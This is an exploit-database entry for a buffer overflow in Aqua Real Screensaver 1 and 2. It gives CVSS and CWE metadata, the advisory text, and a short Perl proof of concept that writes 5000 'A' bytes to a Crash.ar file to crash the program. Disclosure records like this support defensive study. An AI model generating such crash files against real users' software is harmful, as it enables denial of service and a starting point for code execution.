header-logo
Suggest Exploit
vendor:
Aqua Real Screensaver
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Aqua Real Screensaver
Affected Version From: Aqua Real 1
Affected Version To: Aqua Real 2
Patch Exists: NO
Related CWE: Unknown
CPE: a:aqua_real_screensaver:aqua_real_screensaver
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Aqua Real Screensaver Buffer Overflow Vulnerability

Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40606/info

Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.

Aqua Real 1 and 2 are vulnerable; other versions may also be affected. 

#!c/perl/bin/
my $file= "Crash.ar";
my $boom="\x41" x 5000;
open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";